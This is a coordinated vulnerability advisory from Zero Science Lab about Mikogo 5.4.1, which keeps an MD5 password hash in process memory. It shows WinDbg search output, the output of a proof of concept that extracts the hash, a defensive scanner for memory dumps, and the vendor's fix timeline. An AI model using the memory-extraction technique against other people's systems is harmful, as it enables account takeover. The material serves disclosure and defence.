Mikogo 5.4.1.160608 Local Credentials Disclosure

Title: Mikogo 5.4.1.160608 Local Credentials Disclosure
Advisory ID: ZSL-2017-5439
Type: Local
Impact: Exposure of Sensitive Information, Security Bypass
Risk: (3/5)
Release Date: 23.10.2017
Summary
Mikogo is a desktop sharing software application for web conferencing and remote support, and is provided by the online collaboration provider, BeamYourScreen GmbH. Mikogo provides its software as native downloads for Windows, Mac OS X, Linux, iOS and Android.
Description
Mikogo is vulnerable to local credentials disclosure: the supplied password is stored as an MD5 hash in process memory. A potential attacker could reveal the supplied password hash and re-use it or store it via the configuration file in order to gain access to the account.

--------------------------------------------------------------------------------

0:017> s -a 0 L?80000000 "password="
0125cdad 70 61 73 73 77 6f 72 64-3d 00 00 26 6c 61 6e 67 password=..&lang
0146e6b8 70 61 73 73 77 6f 72 64-3d 00 00 00 64 6f 6d 61 password=...doma
06a422b3 70 61 73 73 77 6f 72 64-3d 34 42 33 42 38 37 34 password=482C811
0:017> da 06a422b3
06a422b3 "password=482C811DA5D5B4BC6D497FF"
06a422d3 "A98491E38...."

...
...

C:\Users\Charlie\Desktop>python mikogo_mem.py
[~] Searching for pid by process name 'Mikogo-host.exe'..
[+] Found process with pid #1116
[~] Trying to read memory for pid #1116
[+] Credentials found!
----------------------------------------
[+] MD5 Password: 482C811DA5D5B4BC6D497FFA98491E38

--------------------------------------------------------------------------------
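
For checking a memory dump of your own Mikogo-host.exe process after upgrading, the scan below repeats the `password=` search offline and separates empty fields (like the first two WinDbg hits above) from ones followed by a 32-hex-digit MD5 value. It is an added example, not the advisory's mikogo_mem.py; the function name, the UTF-16LE check (a generalization beyond the ASCII search shown above) and the sample buffer are constructed assumptions.

```python
import re

# Constructed stand-in digest; not a value from the advisory.
FAKE_MD5 = b"0123456789ABCDEF" * 2

KEY = "password="
PATTERNS = {
    # "password=" + exactly 32 hex digits, as in the populated WinDbg hit.
    "ascii": re.compile(
        re.escape(KEY.encode("ascii")) + rb"([0-9A-Fa-f]{32})(?![0-9A-Fa-f])"),
    # Same string as UTF-16LE (assumption: wide-character copies may exist too).
    "utf-16le": re.compile(
        re.escape(KEY.encode("utf-16le"))
        + rb"((?:[0-9A-Fa-f]\x00){32})(?![0-9A-Fa-f]\x00)"),
}


def find_md5_credentials(buf: bytes, base: int = 0):
    """Return sorted (address, encoding, redacted digest) for populated hits."""
    hits = []
    for enc, pat in PATTERNS.items():
        for m in pat.finditer(buf):
            digest = m.group(1).decode(enc)
            # Redact so the report itself does not become a credential store.
            hits.append((base + m.start(), enc, digest[:4] + "*" * 28))
    return sorted(hits)


# Constructed buffer: one empty field, one ASCII hit, one UTF-16LE hit.
SAMPLE = (
    b"\x00" * 5 + b"password=\x00\x00&lang" + b"\xff" * 3
    + b"password=" + FAKE_MD5 + b"\x00"
    + (KEY + FAKE_MD5.decode("ascii")).encode("utf-16le") + b"\x00\x00"
)

if __name__ == "__main__":
    for addr, enc, redacted in find_md5_credentials(SAMPLE, base=0x1000):
        print(f"{addr:08x}  {enc:<8}  password={redacted}")
```

An empty result on a dump taken while logged in is the outcome to expect from a fixed build; any hit means a password-equivalent value is still resident in memory.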

Vendor
Snapview GmbH - https://www.mikogo.com
Affected Version
5.4.1.160608
Tested On
Microsoft Windows 7 Professional SP1 (EN)
Vendor Status
[03.07.2017] Vulnerability discovered.
[12.07.2017] Vendor contacted.
[12.07.2017] Vendor responds asking for more details.
[12.07.2017] Sent details to the vendor.
[13.07.2017] Vendor is investigating the issue.
[31.07.2017] Asked vendor for status update.
[01.08.2017] Vendor responds confirming the issue, planning to improve the way they store authentication information in their configuration file and how it is computed in the system's memory. Plans to release a fix together with further improvements in version 5.7.x within the next three months.
[01.08.2017] Replied to the vendor.
[14.08.2017] Asked vendor for status update.
[26.08.2017] No response from the vendor.
[27.08.2017] Asked vendor for status update.
[29.08.2017] Vendor responds that they are in the finalization phase, which includes quality assurance and infrastructure preparations. Plans to release in November at the latest.
[23.10.2017] Vendor releases version 5.9.0 to address this issue.
[23.10.2017] Coordinated public security advisory released.
PoC
mikogo_mem.py
Credits
Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>
References
[1] https://www.mikogo.com/2017/10/23/new-mikogo-release/
[2] https://mikogo.zendesk.com/hc/en-us/articles/200453033-Release-Notes
[3] https://www.exploit-db.com/exploits/43033/
[4] https://exchange.xforce.ibmcloud.com/vulnerabilities/134057
[5] https://packetstormsecurity.com/files/144715
[6] https://cxsecurity.com/issue/WLB-2017100181
Changelog
[23.10.2017] - Initial release
[26.10.2017] - Added references [3], [4], [5] and [6]
Contact
Zero Science Lab

Web: http://www.zeroscience.mk
e-mail: lab@zeroscience.mk